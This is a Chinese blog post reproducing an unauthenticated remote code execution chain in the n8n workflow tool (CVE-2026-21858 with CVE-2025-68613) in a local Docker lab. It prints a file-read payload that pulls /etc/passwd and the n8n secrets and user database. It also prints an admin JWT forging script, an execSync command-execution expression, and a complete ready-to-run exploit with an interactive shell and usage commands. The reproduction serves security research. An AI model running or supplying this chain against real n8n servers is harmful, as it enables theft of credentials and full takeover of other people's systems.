Featured image of post CVE-2026-21858复现(n8n未授权RCE)

CVE-2026-21858复现(n8n未授权RCE)

CVE-2026-21858复现(n8n未授权RCE)

准备

https://github.com/Chocapikk/CVE-2026-21858去项目地址下载docker部署n8n,默认账号密码admin@exploit.local/ExploitLab123!先不要登入

漏洞复现

任意文件读取

首先作者设置的未授权api是/form/vulnerable-form

image-20260108194941529

直接就是文件上传,跟着文章:https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858

随便上传一个文件抓包

改Content-Type为application/json,请求体为

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
{
    "data": {},
    "files": {
        "field-0": {
            "filepath": "/etc/passwd",
            "originalFilename": "1.pdf",
            "mimetype": "text/plain",
            "extension": ""
        }
    }
}

image-20260108195150279

相比与原文还要跟ai聊天获取,这个更直接,直接有回显,现在我们完成了任意文件读取

伪造admin的jwt

n8n 将身份验证会话存储在一个名为 n8n-auth 的 cookie 中,加密过程如图

image-20260108200409118

所以我们需要读取数据库文件,拿到id,email和password

接着需要n8n的密钥对这个json进行加密得到jwt

image-20260108200738144

这些内容如果n8n是docker构建的话是保存在/home/.n8n目录下的

image-20260108200920736

数据库文件里面存着id,email和password,然后config如图是能读到key的

首先要读home的目录

image-20260108201119926

是root,接下来读另外两个文件

image-20260108202340251

database的话burp全部复制响应删掉响应头导出就行了

这里找ai搓了一个生成jwt的脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import hashlib
import jwt
from base64 import b64encode

def generate_n8n_admin_token(uid, email, pw_hash, encryption_key):
    # 1. 派生签名密钥 (Secret Derivation)
    # 逻辑:取 encryptionKey 的每隔一个字符,然后进行 SHA256 并转为十六进制
    sliced_key = encryption_key[::2]
    secret = hashlib.sha256(sliced_key.encode()).hexdigest()
    
    # 2. 计算 Payload 中的 hash 字段
    # 逻辑:将 email 和 password_hash 拼接,进行 SHA256,Base64 编码后取前 10 位
    hash_input = f"{email}:{pw_hash}".encode()
    hash_digest = hashlib.sha256(hash_input).digest()
    h_claim = b64encode(hash_digest).decode()[:10]
    
    # 3. 构造 Payload
    payload = {
        "id": uid,
        "hash": h_claim
    }
    
    # 4. 使用 HS256 算法和派生的 secret 进行签名
    token = jwt.encode(payload, secret, algorithm="HS256")
    
    return token, secret, h_claim

# 输入参数
target_id = "6dfdc046-c3b2-4a24-895a-aa8861f42fe1"
target_email = "admin@exploit.local"
target_pw_hash = "$2a$10$thRakOhxmhH6bmEI1z9BpOmdfQcIy21gspPPtplBE0.8EqwteET2e"
target_enc_key = "JtBYHUPkTyEiJviVWXtFhZcUudLlL7eb"

# 执行生成
token, derived_secret, derived_hash = generate_n8n_admin_token(
    target_id, target_email, target_pw_hash, target_enc_key
)

print("-" * 30)
print(f"[*] 派生密钥 (Secret): {derived_secret}")
print(f"[*] 载荷哈希 (Hash Claim): {derived_hash}")
print(f"[*] 生成的 JWT Token:\n{token}")
print("-" * 30)
print(f"使用方法: \n在请求头中添加: Cookie: n8n-auth={token}")

image-20260108205341807

成功以admin登入了

RCE

接下来参考:https://github.com/wioui/n8n-CVE-2025-68613-exploit

image-20260108210124263

image-20260108210140710

image-20260108210458527

这里说白了就是直接执行,没有什么沙箱逃逸罢(

1
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

脚本

就是作者项目的脚本

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
#!/usr/bin/env python3
"""
CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain Exploit
Arbitrary File Read → Admin Token Forge → Sandbox Bypass → RCE

Author: Chocapikk
GitHub: https://github.com/Chocapikk/CVE-2026-21858
"""

import argparse
import hashlib
import json
import secrets
import sqlite3
import string
import tempfile
from base64 import b64encode

import jwt
import requests
from pwn import log

BANNER = """
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain          ║
║     Arbitrary File Read → Token Forge → Sandbox Bypass → RCE  ║
║                                                               ║
║     by Chocapikk                                              ║
╚═══════════════════════════════════════════════════════════════╝
"""

RCE_PAYLOAD = '={{ (function() { var require = this.process.mainModule.require; var execSync = require("child_process").execSync; return execSync("CMD").toString(); })() }}'


def randstr(n: int = 12) -> str:
    return "".join(secrets.choice(string.ascii_lowercase + string.digits) for _ in range(n))


def randpos() -> list[int]:
    return [secrets.randbelow(500) + 100, secrets.randbelow(500) + 100]


class Ni8mare:
    def __init__(self, base_url: str, form_path: str):
        self.base_url = base_url.rstrip("/")
        self.form_url = f"{self.base_url}/{form_path.lstrip('/')}"
        self.session = requests.Session()
        self.admin_token = None

    def _api(self, method: str, path: str, **kwargs) -> requests.Response | None:
        kwargs.setdefault("timeout", 30)
        kwargs.setdefault("cookies", {"n8n-auth": self.admin_token} if self.admin_token else {})
        resp = self.session.request(method, f"{self.base_url}{path}", **kwargs)
        return resp if resp.ok else None

    def _lfi_payload(self, filepath: str) -> dict:
        return {
            "data": {},
            "files": {
                f"f-{randstr(6)}": {
                    "filepath": filepath,
                    "originalFilename": f"{randstr(8)}.bin",
                    "mimetype": "application/octet-stream",
                    "size": secrets.randbelow(90000) + 10000
                }
            }
        }

    def _build_nodes(self, command: str) -> tuple[list, dict, str, str]:
        trigger_name, rce_name = f"T-{randstr(8)}", f"R-{randstr(8)}"
        result_var = f"v{randstr(6)}"
        payload_value = RCE_PAYLOAD.replace("CMD", command.replace('"', '\\"'))
        nodes = [
            {"parameters": {}, "name": trigger_name, "type": "n8n-nodes-base.manualTrigger",
             "typeVersion": 1, "position": randpos(), "id": f"t-{randstr(12)}"},
            {"parameters": {"values": {"string": [{"name": result_var, "value": payload_value}]}},
             "name": rce_name, "type": "n8n-nodes-base.set", "typeVersion": 2,
             "position": randpos(), "id": f"r-{randstr(12)}"}
        ]
        connections = {trigger_name: {"main": [[{"node": rce_name, "type": "main", "index": 0}]]}}
        return nodes, connections, trigger_name, rce_name

    # ========== Arbitrary File Read (CVE-2026-21858) ==========

    def read_file(self, filepath: str, timeout: int = 30) -> bytes | None:
        resp = self.session.post(
            self.form_url, json=self._lfi_payload(filepath),
            headers={"Content-Type": "application/json"}, timeout=timeout
        )
        return resp.content if resp.ok and resp.content else None

    def get_version(self) -> tuple[str, bool]:
        resp = self._api("GET", "/rest/settings", timeout=10)
        version = resp.json().get("data", {}).get("versionCli", "0.0.0") if resp else "0.0.0"
        major, minor = map(int, version.split(".")[:2])
        return version, major < 1 or (major == 1 and minor < 121)

    def get_home(self) -> str | None:
        data = self.read_file("/proc/self/environ")
        if not data:
            return None
        for var in data.split(b"\x00"):
            if var.startswith(b"HOME="):
                return var.decode().split("=", 1)[1]
        return None

    def get_key(self, home: str) -> str | None:
        data = self.read_file(f"{home}/.n8n/config")
        return json.loads(data).get("encryptionKey") if data else None

    def get_db(self, home: str) -> bytes | None:
        return self.read_file(f"{home}/.n8n/database.sqlite", timeout=120)

    def extract_admin(self, db: bytes) -> tuple[str, str, str] | None:
        with tempfile.NamedTemporaryFile(suffix=".db") as f:
            f.write(db)
            f.flush()
            conn = sqlite3.connect(f.name)
            row = conn.execute("SELECT id, email, password FROM user WHERE role='global:owner' LIMIT 1").fetchone()
            conn.close()
        return (row[0], row[1], row[2]) if row else None

    def forge_token(self, key: str, uid: str, email: str, pw_hash: str) -> str:
        secret = hashlib.sha256(key[::2].encode()).hexdigest()
        h = b64encode(hashlib.sha256(f"{email}:{pw_hash}".encode()).digest()).decode()[:10]
        self.admin_token = jwt.encode({"id": uid, "hash": h}, secret, "HS256")
        return self.admin_token

    def verify_token(self) -> bool:
        return self._api("GET", "/rest/users", timeout=10) is not None

    # ========== RCE (CVE-2025-68613) ==========

    def rce(self, command: str) -> str | None:
        nodes, connections, _, _ = self._build_nodes(command)
        wf_name = f"wf-{randstr(16)}"
        workflow = {"name": wf_name, "active": False, "nodes": nodes,
                    "connections": connections, "settings": {}}

        resp = self._api("POST", "/rest/workflows", json=workflow, timeout=10)
        if not resp:
            return None
        wf_id = resp.json().get("data", {}).get("id")
        if not wf_id:
            return None

        run_data = {"workflowData": {"id": wf_id, "name": wf_name, "active": False,
                                      "nodes": nodes, "connections": connections, "settings": {}}}
        resp = self._api("POST", f"/rest/workflows/{wf_id}/run", json=run_data, timeout=30)
        if not resp:
            self._api("DELETE", f"/rest/workflows/{wf_id}", timeout=5)
            return None

        exec_id = resp.json().get("data", {}).get("executionId")
        result = self._get_result(exec_id) if exec_id else None
        self._api("DELETE", f"/rest/workflows/{wf_id}", timeout=5)
        return result

    def _get_result(self, exec_id: str) -> str | None:
        resp = self._api("GET", f"/rest/executions/{exec_id}", timeout=10)
        if not resp:
            return None
        data = resp.json().get("data", {}).get("data")
        if not data:
            return None
        parsed = json.loads(data)
        # Result is usually the last non-empty string
        for item in reversed(parsed):
            if isinstance(item, str) and len(item) > 3 and item not in ("success", "error"):
                return item.strip()
        return None

    # ========== Full Chain ==========

    def pwn(self) -> bool:
        p = log.progress("HOME directory")
        home = self.get_home()
        if not home:
            return p.failure("Not found") or False
        p.success(home)

        p = log.progress("Encryption key")
        key = self.get_key(home)
        if not key:
            return p.failure("Failed") or False
        p.success(f"{key[:8]}...")

        p = log.progress("Database")
        db = self.get_db(home)
        if not db:
            return p.failure("Failed") or False
        p.success(f"{len(db)} bytes")

        p = log.progress("Admin user")
        admin = self.extract_admin(db)
        if not admin:
            return p.failure("Not found") or False
        uid, email, pw = admin
        p.success(email)

        p = log.progress("Token forge")
        self.forge_token(key, uid, email, pw)
        p.success("OK")

        p = log.progress("Admin access")
        if not self.verify_token():
            return p.failure("Rejected") or False
        p.success("GRANTED!")

        log.success(f"Cookie: n8n-auth={self.admin_token}")
        return True


def parse_args():
    p = argparse.ArgumentParser(description="n8n Ni8mare - Full Chain Exploit")
    p.add_argument("url", help="Target URL (http://target:5678)")
    p.add_argument("form", help="Form path (/form/upload)")
    p.add_argument("--read", metavar="PATH", help="Read arbitrary file")
    p.add_argument("--cmd", metavar="CMD", help="Execute single command")
    p.add_argument("-o", "--output", metavar="FILE", help="Save LFI output to file")
    return p.parse_args()


def run_read(exploit: Ni8mare, path: str, output: str | None) -> None:
    data = exploit.read_file(path)
    if not data:
        log.error("File read failed")
        return
    log.success(f"{len(data)} bytes")
    if output:
        with open(output, "wb") as f:
            f.write(data)
        log.success(f"Saved: {output}")
        return
    print(data.decode())


def run_cmd(exploit: Ni8mare, cmd: str) -> None:
    p = log.progress("RCE")
    out = exploit.rce(cmd)
    if not out:
        p.failure("Failed")
        return
    p.success("OK")
    print(f"\n{out}")


def run_shell(exploit: Ni8mare) -> None:
    log.info("Interactive mode (type 'exit' to quit)")
    while True:
        try:
            cmd = input("\033[91mn8n\033[0m> ").strip()
        except (EOFError, KeyboardInterrupt):
            print()
            return
        if not cmd or cmd == "exit":
            return
        out = exploit.rce(cmd)
        if out:
            print(out)


def main():
    print(BANNER)
    args = parse_args()

    exploit = Ni8mare(args.url, args.form)
    version, vuln = exploit.get_version()
    log.info(f"Target: {exploit.form_url}")
    log.info(f"Version: {version} ({'VULN' if vuln else 'SAFE'})")

    if args.read:
        run_read(exploit, args.read, args.output)
        return

    if not exploit.pwn():
        return

    if args.cmd:
        run_cmd(exploit, args.cmd)
        return

    run_shell(exploit)


if __name__ == "__main__":
    main()

使用方法

1
2
3
4
//执行命令
python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"
//交互shell
python exploit.py http://localhost:5678 /form/vulnerable-form

局限性

首先需要文件上传表单,目标必须具有带有文件上传字段的表单工作流,而且我们改完包之后,必须要有回显,然后这个workflow必须能未授权上传

例如下面这个配置就容易被攻击

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
{
  "nodes": [
    {
      "name": "Form Trigger",
      "type": "n8n-nodes-base.formTrigger",
      "parameters": {
        "responseMode": "responseNode",
        "formFields": {
          "values": [{ "fieldLabel": "document", "fieldType": "file" }]
        }
      }
    },
    {
      "name": "Respond",
      "type": "n8n-nodes-base.respondToWebhook",
      "parameters": {
        "respondWith": "binary",
        "inputDataFieldName": "document"
      }
    }
  ],
  "connections": {
    "Form Trigger": { "main": [[{ "node": "Respond" }]] }
  }
}
Licensed under 9u_l3
使用 Hugo 构建
主题 StackJimmy 设计